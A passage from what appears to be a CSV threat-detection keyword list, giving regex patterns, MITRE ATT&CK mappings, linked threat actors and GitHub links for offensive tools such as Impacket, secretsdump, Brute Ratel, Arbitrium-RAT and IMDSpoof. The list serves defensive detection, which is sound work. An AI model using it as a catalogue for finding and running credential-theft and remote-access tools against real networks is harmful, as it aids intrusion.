SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48241" "*IMDS Service Spoofing Enabled*",".{0,1000}IMDS\sService\sSpoofing\sEnabled.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/grahamhelton/IMDSpoof","1","0","N/A","N/A","8","2","101","3","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z","48242" "*IMDSPoof Honey Token*",".{0,1000}IMDSPoof\sHoney\sToken.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/grahamhelton/IMDSpoof","1","0","N/A","N/A","8","2","101","3","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z","48243" "*IMDSpoof*IMDS.go*",".{0,1000}IMDSpoof.{0,1000}IMDS\.go.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & 
Spoofing","https://github.com/grahamhelton/IMDSpoof","1","0","N/A","N/A","8","2","101","3","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z","48244" "*IMDSpoof-main*",".{0,1000}IMDSpoof\-main.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/grahamhelton/IMDSpoof","1","1","N/A","N/A","8","2","101","3","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z","48245" "*imgproxy.dev.pico.sh*",".{0,1000}imgproxy\.dev\.pico\.sh.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","1","N/A","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","48246" "*im-hanzou/Arbitrium-RAT*",".{0,1000}im\-hanzou\/Arbitrium\-RAT.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","1","N/A","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","48247" "*imp_Badger*",".{0,1000}imp_Badger.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - 
T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","48248" "*impacket minikerberos*",".{0,1000}impacket\sminikerberos.{0,1000}","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550.003 - T1557.002 - T1552.004 - T1212 - T1550","TA0009 - TA0008","N/A","N/A","Lateral Movement","https://github.com/dirkjanm/PKINITtools","1","0","N/A","N/A","N/A","8","737","82","2025-01-03T14:25:52Z","2021-07-27T19:06:09Z","48249" "*impacket*",".{0,1000}impacket.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch. as well as parsed from raw data. and the object oriented API makes it simple to work with deep hierarchies of protocols. 
The library provides a set of tools as examples of what can be done within the context of this library","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48250" "*impacket*",".{0,1000}impacket.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch. as well as parsed from raw data. and the object oriented API makes it simple to work with deep hierarchies of protocols. 
The library provides a set of tools as examples of what can be done within the context of this library.","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48251" "*impacket-* *",".{0,1000}impacket\-.{0,1000}\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48253" "*impacket-*.tar.gz*",".{0,1000}impacket\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48254" "*impacket.*",".{0,1000}impacket\..{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - 
Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","N/A","10","10","1484","248","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z","48255" "*impacket.*",".{0,1000}impacket\..{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","N/A","6","555","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z","48256" "*'impacket.*",".{0,1000}\'impacket\..{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48257" "*impacket.dcerpc*",".{0,1000}impacket\.dcerpc.{0,1000}","offensive_tool_keyword","atexec-pro","Fileless atexec for lateral movement","T1021.002 - T1105","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Ridter/atexec-pro","1","0","#content","N/A","10","4","366","45","2024-03-28T03:36:50Z","2024-03-27T09:15:00Z","48258" "*impacket.dcerpc*",".{0,1000}impacket\.dcerpc.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","#content","N/A","10","3","201","25","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z","48259" "*impacket.dcerpc.v5*",".{0,1000}impacket\.dcerpc\.v5.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","N/A","9","2","163","24","2024-06-17T16:20:10Z","2024-04-17T13:00:12Z","48260" "*impacket.dcerpc.v5*",".{0,1000}impacket\.dcerpc\.v5.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM 
Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","N/A","10","9","842","113","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z","48261" "*impacket.examples.secretsdump*",".{0,1000}impacket\.examples\.secretsdump.{0,1000}","offensive_tool_keyword","secretsdump","secretdump.py from impacket - https://github.com/fortra/impacket","T1003.003","TA0006","Operation Wocao","Black Basta - Rhysida - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - ALLANITE","Credential Access","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48262" "*impacket.git*",".{0,1000}impacket\.git.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48263" "*impacket.ImpactPacket*",".{0,1000}impacket\.ImpactPacket.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48264" "*impacket.internal_helpers*",".{0,1000}impacket\.internal_helpers.{0,1000}","offensive_tool_keyword","impacketremoteshell","install a legit application and interface with it over smb w/o the signature of cmd.exe / powershell.exe being called or the redirection typically used by those techniques","T1077 - T1059.007 - T1569.001","TA0008 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","48265" "*impacket.krb5*",".{0,1000}impacket\.krb5.{0,1000}","offensive_tool_keyword","atexec-pro","Fileless atexec for lateral movement","T1021.002 - T1105","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Ridter/atexec-pro","1","0","#content","N/A","10","4","366","45","2024-03-28T03:36:50Z","2024-03-27T09:15:00Z","48266" "*impacket.krb5.*",".{0,1000}impacket\.krb5\..{0,1000}","offensive_tool_keyword","RITM","python Man in the middle ","T1557.002 - T1040 - T1098.002 - T1557.001 - T1552.001","TA0006 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/Tw1sm/RITM","1","0","N/A","N/A","9","3","292","27","2024-11-20T14:27:24Z","2022-10-05T01:10:33Z","48267" 
"*impacket.krb5.asn1*",".{0,1000}impacket\.krb5\.asn1.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48268" "*impacket.krb5.ccache*",".{0,1000}impacket\.krb5\.ccache.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48269" "*impacket.krb5.kerberosv5*",".{0,1000}impacket\.krb5\.kerberosv5.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48270" "*impacket.ldap*",".{0,1000}impacket\.ldap.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48271" "*impacket.ldap*",".{0,1000}impacket\.ldap.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","48272" "*impacket.msada_guids*",".{0,1000}impacket\.msada_guids.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48273" "*impacket.ntlm*",".{0,1000}impacket\.ntlm.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48274" "*impacket.smbconnection*",".{0,1000}impacket\.smbconnection.{0,1000}","offensive_tool_keyword","conpass","Continuous password spraying tool","T1110.001 - T1110 - T1078.001 - T1201","TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://github.com/login-securite/conpass","1","0","N/A","N/A","10","2","181","17","2025-03-03T15:05:25Z","2022-12-15T18:03:42Z","48275" "*impacket.smbconnection*",".{0,1000}impacket\.smbconnection.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","N/A","9","2","163","24","2024-06-17T16:20:10Z","2024-04-17T13:00:12Z","48276" "*impacket.smbconnection*",".{0,1000}impacket\.smbconnection.{0,1000}","offensive_tool_keyword","impacketremoteshell","install a legit application and interface with it over smb w/o the signature of cmd.exe / powershell.exe being called or the redirection typically used by those techniques","T1077 - T1059.007 - T1569.001","TA0008 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","48277" 
"*impacket.smbconnection*",".{0,1000}impacket\.smbconnection.{0,1000}","offensive_tool_keyword","smbcrawler","SmbCrawler is a tool that takes credentials and a list of hosts and crawls through those shares","T1077 - T1021 - T1110 - T1083","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/SySS-Research/smbcrawler","1","1","N/A","N/A","N/A","2","161","21","2025-03-24T07:46:43Z","2021-06-09T19:27:08Z","48278" "*impacket.smbconnection.SMBConnection*",".{0,1000}impacket\.smbconnection\.SMBConnection.{0,1000}","offensive_tool_keyword","smbscan","SMBScan is a tool to enumerate file shares on an internal network.","T1135 - T1046 - T1021","TA0007 - TA0043 - TA0008","N/A","APT22","Discovery","https://github.com/jeffhacks/smbscan","1","0","N/A","N/A","8","1","44","6","2025-03-24T01:55:30Z","2021-10-26T02:28:34Z","48279" "*impacket/*.py*",".{0,1000}impacket\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48280" "*impacket:latest*",".{0,1000}impacket\:latest.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48281" "*impacket:latest*","Impacket\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
